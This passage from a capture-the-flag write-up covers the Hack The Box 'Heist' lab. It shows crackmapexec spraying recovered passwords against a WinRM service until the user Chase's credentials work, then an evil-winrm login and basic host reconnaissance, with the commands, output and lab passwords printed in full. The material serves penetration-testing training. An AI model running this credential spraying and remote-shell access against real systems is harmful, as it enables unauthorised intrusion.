WinRM


The WinRM service (TCP 5985) was revealed during the earlier Nmap scan.

crackmapexec


I got 2 system credentials VALIDATED through cme earlier. cme also supports brute-forcing against a WinRM server, so I am hoping that one of those accounts is part of the Remote Management Users group.

┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ crackmapexec winrm $IP -u users -p passwd --continue-on-success
SMB         10.10.10.149    5985   NONE             [*] None (name:10.10.10.149) (domain:None)
HTTP        10.10.10.149    5985   NONE             [*] http://10.10.10.149:5985/wsman
WINRM       10.10.10.149    5985   NONE             [-] None\administrator:stealth1agent
WINRM       10.10.10.149    5985   NONE             [-] None\administrator:$uperP@ssword
WINRM       10.10.10.149    5985   NONE             [-] None\administrator:Q4)sJu\Y8qz*A3?d
WINRM       10.10.10.149    5985   NONE             [-] None\Hazard:stealth1agent
WINRM       10.10.10.149    5985   NONE             [-] None\Hazard:$uperP@ssword
WINRM       10.10.10.149    5985   NONE             [-] None\Hazard:Q4)sJu\Y8qz*A3?d
WINRM       10.10.10.149    5985   NONE             [-] None\support:stealth1agent
WINRM       10.10.10.149    5985   NONE             [-] None\support:$uperP@ssword
WINRM       10.10.10.149    5985   NONE             [-] None\support:Q4)sJu\Y8qz*A3?d
WINRM       10.10.10.149    5985   NONE             [-] None\Chase:stealth1agent
WINRM       10.10.10.149    5985   NONE             [-] None\Chase:$uperP@ssword
WINRM       10.10.10.149    5985   NONE             [+] None\Chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)
WINRM       10.10.10.149    5985   NONE             [-] None\Chase:Q4)sJu\Y8qz*A3?d "'NoneType' object has no attribute 'upper'"
WINRM       10.10.10.149    5985   NONE             [-] None\Jason:stealth1agent
WINRM       10.10.10.149    5985   NONE             [-] None\Jason:$uperP@ssword
WINRM       10.10.10.149    5985   NONE             [-] None\Jason:Q4)sJu\Y8qz*A3?d
WINRM       10.10.10.149    5985   NONE             [-] None\rout3r:stealth1agent
WINRM       10.10.10.149    5985   NONE             [-] None\rout3r:$uperP@ssword
WINRM       10.10.10.149    5985   NONE             [-] None\rout3r:Q4)sJu\Y8qz*A3?d
WINRM       10.10.10.149    5985   NONE             [-] None\admin:stealth1agent
WINRM       10.10.10.149    5985   NONE             [-] None\admin:$uperP@ssword
WINRM       10.10.10.149    5985   NONE             [-] None\admin:Q4)sJu\Y8qz*A3?d

The Chase user is VALIDATED to be part of the Remote Management Users group. This means that I can connect to the target system as the Chase user.

evil-winrm


┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ evil-winrm -i $IP -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents> whoami
supportdesk\chase
*Evil-WinRM* PS C:\Users\Chase\Documents> hostname
SupportDesk
*Evil-WinRM* PS C:\Users\Chase\Documents> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::67
   IPv6 Address. . . . . . . . . . . : dead:beef::2d99:5fb6:1477:7b95
   Link-local IPv6 Address . . . . . : fe80::2d99:5fb6:1477:7b95%15
   IPv4 Address. . . . . . . . . . . : 10.10.10.149
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%15
                                       10.10.10.2

Initial foothold established as the Chase user via evil-winrm.